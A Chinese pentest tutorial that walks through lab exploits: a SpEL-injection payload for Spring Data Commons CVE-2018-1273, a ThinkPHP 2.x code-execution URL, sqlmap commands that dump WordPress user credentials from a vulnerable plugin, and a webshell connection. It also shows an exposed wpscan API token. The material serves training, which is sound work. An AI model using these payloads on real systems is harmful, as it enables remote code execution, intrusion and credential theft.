WEB应用漏洞发现

WEB应用漏洞发现

  • 一、以知框架漏洞发现
      • 1.1 Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
          • 1. 环境搭建
          • 2. 漏洞复现
      • 1.2 ThinkPHP 2.x 任意代码执行漏洞
          • 1. 环境搭建
          • 2. 漏洞复现
  • 二、以知CMS漏洞发现
    • 1. WordPress插件漏洞分析溯源
        • 1.1 wpscan进行漏洞扫描
        • 1.2 WordPress插件漏洞分析溯源漏洞复现过程
  • 三、未知CMS漏洞发现


一、以知框架漏洞发现

对于以知框架,直接在网上搜索对应的POC利用即可,如下介绍PHP和JAVA的两个框架漏洞,如下两个漏洞都是在vulhub环境下使用的,vulhub搭建教程

1.1 Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

1. 环境搭建
cd vulnhub
cd spring/CVE-2018-1273
docker-compose up -d

WEB应用漏洞发现_第1张图片

2. 漏洞复现

使用如上命令后直接访问http://192.168.93.131:8080/users,其中192.168.93.131是你的虚拟机的IP地址,打开后是一个登录页面,进行注册后进行抓包。如下所示:

WEB应用漏洞发现_第2张图片

POC如下所示:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述

执行如上POC后,会在虚拟机的/tmp下创建一个susses的文件,如果创建成功,就说明POC利用成功,如下命令把运行环境销毁:

 docker-compose down -v    # 把运行环境销毁

WEB应用漏洞发现_第3张图片

1.2 ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
1. 环境搭建
cd vulnhub
cd thinkphp/2-rce
docker-compose up -d

WEB应用漏洞发现_第4张图片

出现如上所示就是搭建成功的标准

2. 漏洞复现

POC如下所示:

http://192.168.93.131:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D

WEB应用漏洞发现_第5张图片

 docker-compose down -v  # 关闭漏洞环境

二、以知CMS漏洞发现

1. WordPress插件漏洞分析溯源

WordPress靶场地址,进入靶场后如下所示:

WEB应用漏洞发现_第6张图片

1.1 wpscan进行漏洞扫描

输入wpscan --url http://124.70.71.251:45047/ --api-token cwvl2xxDKRIdjM4mtoqazFQwz2evGlJ70HJHeZ4wsgk进行漏洞扫描,其中apitoken申请:APItoken注册地址

WEB应用漏洞发现_第7张图片

1.2 WordPress插件漏洞分析溯源漏洞复现过程

漏洞接口为http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22,直接使用sqlmap进行自动化注入,如下所示:

 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" --dbs
 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" -D test --tables
 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" -D test -T wp_users --columns
 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" -D test -T wp_users -C user_login,user_pass --dump

在这里插入图片描述

用户名:admin,密码:12qwaszx,进入http://124.70.71.251:45047/wp-login.php进行登录,在登录到系统后台后,我们点击“插件”——“Comment Rating”,如下所示:

WEB应用漏洞发现_第8张图片

点击更新文件就相当于保存了,使用蚁剑进行连接http://124.70.71.251:45047/wp-admin/plugin-editor.php?file=comment-rating/comment-rating.php,密码是cmd,连接成功后,如下文件夹有flag:

WEB应用漏洞发现_第9张图片

三、未知CMS漏洞发现

未知的CMS只能够看看你不能够搞到源码,进行网站扫描,看能不能给弄到


你可能感兴趣的:(web渗透,前端,web安全)